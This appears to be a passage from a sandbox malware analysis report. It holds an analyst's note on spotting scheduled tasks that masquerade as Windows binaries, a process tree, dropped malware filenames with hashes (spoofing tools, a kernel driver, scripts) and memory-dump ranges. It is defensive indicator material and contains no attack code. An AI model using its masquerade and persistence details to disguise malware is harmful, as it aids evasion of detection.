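The masquerade check is the strongest single signal here: the real explorer.exe, spoolsv.exe, lsass.exe and taskhost.exe only ever run from under C:\Windows, so a scheduled task pointing one of those names at a user profile, Program Files or a root-level directory has almost no legitimate explanation. /rl HIGHEST and minute-interval schedules are weak on their own (installers and updaters use both) and are worth alerting on mainly in combination. The DevManView task is deliberately not flagged as a masquerade: it is a Nirsoft tool name, not a system binary, which is why the summary shows three masqueraded tasks out of four.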
• C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "752025126-628002891-590700494-9858222077262813813564437261862708836546748825"
    1⤵
    PID:1700
• C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1411383421-1766168883-15612447962851288551989038863279291050881413273399109812"
    1⤵
    PID:2804
• C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-855617698-4768896551603069888-8372846494607090741998497141-1585860109-876566517"
    1⤵
    PID:1040
• C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-9334595191544904511-1150525792830207160-1622713821172833150018428872-1242952810"
    1⤵
    PID:1116
• C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1428107885-11538641226024456031794733802115650022-9071930901732239748-527732463"
    1⤵
    PID:1488
• C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "994691572-511111291-1292882474-304860791-1168667435-2060879657353229195201494862"
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:1516
                                                                                                                                                                                                • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                  "LogonUI.exe" /flags:0x0
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:2924
                                                                                                                                                                                                  • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                    "LogonUI.exe" /flags:0x1
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:584

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe (Filesize 226B)
• C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat (Filesize 90B)
• C:\ProgramData\Microsoft\Windows\DevManView.cfg (Filesize 1KB)
• C:\ProgramData\Microsoft\Windows\Disk.bat (Filesize 1KB)
• C:\ProgramData\Microsoft\Windows\amifldrv64.sys (Filesize 18KB)
• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (Filesize 344B)
• C:\Users\Admin\AppData\Local\Temp\4ZoQI0Qg2k.bat (Filesize 189B)
• C:\Users\Admin\AppData\Local\Temp\Cab39F6.tmp (Filesize 68KB)
• C:\Users\Admin\AppData\Local\Temp\Tar3A47.tmp (Filesize 177KB)
• C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe (Filesize 905KB)
• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (Filesize 7KB)
• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (Filesize 7KB)

                                                                                                                                                                                                      d46d7ee41c46eb4f295e6dd8580fafe1

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      9af016e270ffc9b2a06658b1e83b1a490af22bcf

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      a5c97aac08de239ff256c0956aa339d72f6f649af463303dcce9270bdd7b72a2

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      1d2663cba818c0e1bd56a6ad34d6eabab0181882411ae9b4920f25b0551b399a49e1fe356a2e76b1dd0cc22b1b4ea423276f096fb2b4fc810bf15b975d3597a7

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\conhostsft.exe

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      3.1MB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      975eca3793d5ec51d4bd4041fe4bd595

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      f3b36aad3566d36a81cb8ab11c49e28b8fbb807e

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      50a29176f61d2567c67f234d46e2815d0fac1ccd4a6f7577a47133543bff67c3

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      af6f4f07bf32b5aae8b2f21b5d8a8a84cb6e72c73745019729240fb2d94d0b45713a05130dbc1feda2543009705e13f915106a168828d624845b20f6fd7f6c89

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      280f228a0fd9232c72c66646f5ac8f27

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      f6ed9a02fe24afa92b832efb95d4c140f1f9855a

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      6aace057c548df95831b928aab373130bc09f5636fb7fff52372b4280f2ffe51

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      5e919970667464332083dc40152bcb81f96524c35776d0f945244358885253ab2af1ed9b8db52cb22c60730db95dce34615c7df406c6cd6ae8c5fef3a388af6e

                                                                                                                                                                                                    • \ChainReview\sphyperRuntimedhcpSvc.exe

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      93457a02f578affc1800d7528c5370f3

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      fc79e5088c9df79bcd8e53d0b95661c3b5396806

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      ae70f0f9798da6edcd90c47a9a8019a36cdf35a3794a99cd14512d1a1994cbf5

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      4c077177207269bf7b5866376c59e84343b25093a4cf76e8e09cf17400962f97d86463cea4c83286d4451fd7810b3ad638972436adcba61ad57c3ba47e85ce2e

                                                                                                                                                                                                    • \ProgramData\Microsoft\Windows\AMIDEWINx64.exe

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      452KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      c4d09d3b3516550ad2ded3b09e28c10c

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      7a5e77bb9ba74cf57cb1d119325b0b7f64199824

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2

                                                                                                                                                                                                    • \ProgramData\Microsoft\Windows\DevManView.exe

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      162KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      33d7a84f8ef67fd005f37142232ae97e

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      1f560717d8038221c9b161716affb7cd6b14056e

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5

                                                                                                                                                                                                    • \ProgramData\Microsoft\Windows\Volumeid64.exe

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      165KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      81a45f1a91448313b76d2e6d5308aa7a

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      0d615343d5de03da03bce52e11b233093b404083

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d

                                                                                                                                                                                                    • memory/604-268-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      56KB

                                                                                                                                                                                                    • memory/604-270-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      56KB

                                                                                                                                                                                                    • memory/604-271-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      56KB

                                                                                                                                                                                                    • memory/604-273-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      56KB

                                                                                                                                                                                                    • memory/604-269-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      56KB

                                                                                                                                                                                                    • memory/604-267-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      56KB

                                                                                                                                                                                                    • memory/776-222-0x0000000002710000-0x0000000002718000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      32KB

                                                                                                                                                                                                    • memory/776-221-0x000000001B630000-0x000000001B912000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      2.9MB

                                                                                                                                                                                                    • memory/1208-256-0x00000000026E0000-0x00000000026E8000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      32KB

                                                                                                                                                                                                    • memory/1688-4-0x000007FEF5D50000-0x000007FEF673C000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      9.9MB

                                                                                                                                                                                                    • memory/1688-3-0x000007FEF5D50000-0x000007FEF673C000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      9.9MB

                                                                                                                                                                                                    • memory/1688-2-0x00000000001D0000-0x00000000001D6000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      24KB

                                                                                                                                                                                                    • memory/1688-0-0x000007FEF5D53000-0x000007FEF5D54000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      4KB

                                                                                                                                                                                                    • memory/1688-1-0x00000000008E0000-0x000000000090C000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      176KB

                                                                                                                                                                                                    • memory/1932-11-0x00000000027E0000-0x00000000027E8000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      32KB

                                                                                                                                                                                                    • memory/1932-10-0x000000001B800000-0x000000001BAE2000-memory.dmp

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      2.9MB

                                                                                                                                                                                                    • memory/1932-9-0x0000000002E10000-0x0000000002E90000-memory.dmp

  Filesize
  512KB

• memory/2208-255-0x00000000012B0000-0x00000000014B4000-memory.dmp
  Filesize
  2.0MB

• memory/2400-176-0x0000000000370000-0x0000000000388000-memory.dmp
  Filesize
  96KB

• memory/2400-174-0x0000000000350000-0x000000000036C000-memory.dmp
  Filesize
  112KB

• memory/2400-178-0x0000000000330000-0x000000000033E000-memory.dmp
  Filesize
  56KB

• memory/2400-172-0x0000000000320000-0x000000000032E000-memory.dmp
  Filesize
  56KB

• memory/2400-170-0x0000000000E50000-0x0000000001054000-memory.dmp
  Filesize
  2.0MB

• memory/2400-186-0x00000000003B0000-0x00000000003BC000-memory.dmp
  Filesize
  48KB

• memory/2400-184-0x00000000003A0000-0x00000000003AE000-memory.dmp
  Filesize
  56KB

• memory/2400-182-0x0000000000390000-0x000000000039C000-memory.dmp
  Filesize
  48KB

• memory/2400-180-0x0000000000340000-0x000000000034E000-memory.dmp
  Filesize
  56KB